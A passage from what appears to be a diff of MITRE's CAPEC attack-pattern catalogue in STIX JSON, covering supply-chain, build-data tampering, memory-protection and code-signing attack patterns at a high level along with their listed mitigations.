"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cec1097b-0d23-4a54-9ae9-64654e393f3d", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish diversity among suppliers.", + "id": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--864c9da9-4c92-4cea-9641-e0a25d17486e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct rigorous threat assessments of suppliers.", + "id": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--956e89e4-8b30-4e89-aed9-b592c0de779b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that Bills of Material (BoM) for critical parts and components be certified.", + "id": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4da5652f-279d-465c-876f-f61e2bd78e19", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize contract language requiring contractors and subcontractors to flow down to subcontractors and suppliers SCRM and SCRA (Supply Chain Risk Assessment) requirements.", + "id": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6678ab4-13ee-4393-9302-f1f849c12afd", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish trusted supplier networks.", + "id": "course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b49a971-d419-4828-b65f-13ac15c90fd6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the system build process, the system is deliberately misconfigured by the alteration of the build data. Access to system configuration data files and build processes is susceptible to deliberate misconfiguration of the system.\n ", + "external_references": [ + { + "external_id": "CAPEC-678", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/678.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Build Data Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n ‘Make’ is a program used for building executable programs and libraries from source code by executing commands and following rules in a ‘makefile’. It can create a malicious executable if commands or dependency paths in the makefile are maliciously altered to execute an unwanted command or reference as a dependency maliciously altered code.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary has access to the data files and processes used for executing system configuration and performing the build." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement configuration management security practices that protect the integrity of software and associated data.", + "id": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869d19dd-b471-4f89-b47b-0183ac8dc878", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor and control access to the configuration management system.", + "id": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a21325b-976e-41b0-b832-ff513fd781d8", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Harden centralized repositories against attack.", + "id": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb0dbc9b-c7a5-4f9d-982c-b0f25445ecca", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish acceptance criteria for configuration management check-in to assure integrity.", + "id": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Plan for and audit the security of configuration management administration processes.", + "id": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0868754c-7cfa-484b-914c-804bad2eccd0", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain configuration control over operational systems.", + "id": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950b2aca-4816-440a-b10e-52af4e8d7a6b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory.\n ", + "external_references": [ + { + "external_id": "CAPEC-679", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/679.html" + }, + { + "external_id": "CWE-1222", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1222.html" + }, + { + "external_id": "CWE-1252", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1252.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Cortex-R4 Manual, ARM", + "external_id": "REF-687", + "source_name": "reference_from_CAPEC", + "url": "https://developer.arm.com/ip-products/processors/cortex-m/cortex-m4" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Memory Protection Unit (MPU), ARM", + "external_id": "REF-689", + "source_name": "reference_from_CAPEC", + "url": "https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf" + }, + { + "description": "Christopher Domas, The Memory Sinkhole, 2015--07---20", + "external_id": "REF-690", + "source_name": "reference_from_CAPEC", + "url": "https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf" + }, + { + "description": "Address Range Memory Mirroring, 2016--07---13, Taku Izumi, Fujitsu Limited", + "external_id": "REF-691", + "source_name": "reference_from_CAPEC", + "url": "https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf" + }, + { + "description": "Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides, Mikhail Gorobets, BARing the System – New vulnerabilities in Coreboot & UEFI-based Systems, 2017", + "external_id": "REF-692", + "source_name": "reference_from_CAPEC", + "url": "https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf" + } + ], + "id": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Configured or Implemented Memory Protections", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A hardware product contains non-volatile memory, which itself contains boot code that is insufficiently protected. An adversary then modifies this memory to either bypass the secure boot process or to execute their own code.\n ", + "\n A hardware product leverages a CPU that does not possess a memory-protection unit (MPU) and a memory-management unit (MMU) nor a special bit to support write exclusivity, resulting in no write exclusivity. Because of this, an adversary is able to inject malicious code into the memory and later execute it to achieve the desired outcome.\n " + ], + "x_capec_extended_description": "\n Hardware product designs often need to implement memory protection features to prevent users from reading and modifying memory reserved for security operations such as secure booting, authenticating code, device attestation, and more. However, these protection features may be missing if not configured by developers. For example, this can occur if the developers assume these features are configured elsewhere. Additionally, developers often attempt to impose proper protection features, but may incorrectly configure these controls. One such example would be setting controls with insufficient granularity for protected address regions. If an adversary is able to discover improper access controls surrounding memory, it could result in the adversary obtaining sensitive data, executing code, circumventing security mechanisms, escalating privileges, or even denying service to higher privilege software.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of memory structures.", + "Medium": "Ability to craft malicious code to inject into the memory region." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protected and unprotected memory ranges are isolated and do not overlap.", + "id": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93b182a2-5d09-46dc-a864-f76e8794dbc0", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If memory regions must overlap, leverage memory priority schemes if memory regions can overlap.", + "id": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c6a1cf7-f17e-41e5-a34a-c559ed3bab78", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that original and mirrored memory regions apply the same protections.", + "id": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--40599fe1-c651-4840-8670-ea221031fd9b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure immutable code or data is programmed into ROM or write-once memory.", + "id": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1b7b572-66d6-497f-9534-70a94507d789", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.", + "external_references": [ + { + "external_id": "CAPEC-68", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/68.html" + }, + { + "external_id": "CWE-325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Subvert Code-signing Facilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the \"Magic Coat\" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.", + "Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \"true\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.", + "The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "A framework-based language that supports code signing (such as, and most commonly, Java or .NET)", + "Deployed code that has been signed by its authoring vendor, or a partner.", + "The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated." + ], + "x_capec_resources_required": [ + "The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack." + ], + "x_capec_skills_required": { + "High": "Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.", + "id": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e2f360c-c268-4b41-a5b7-b73b41b6ad49", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If an attacker cannot attack the scheme directly, they might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.", + "id": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-1", + "object_marking_refs": [ + 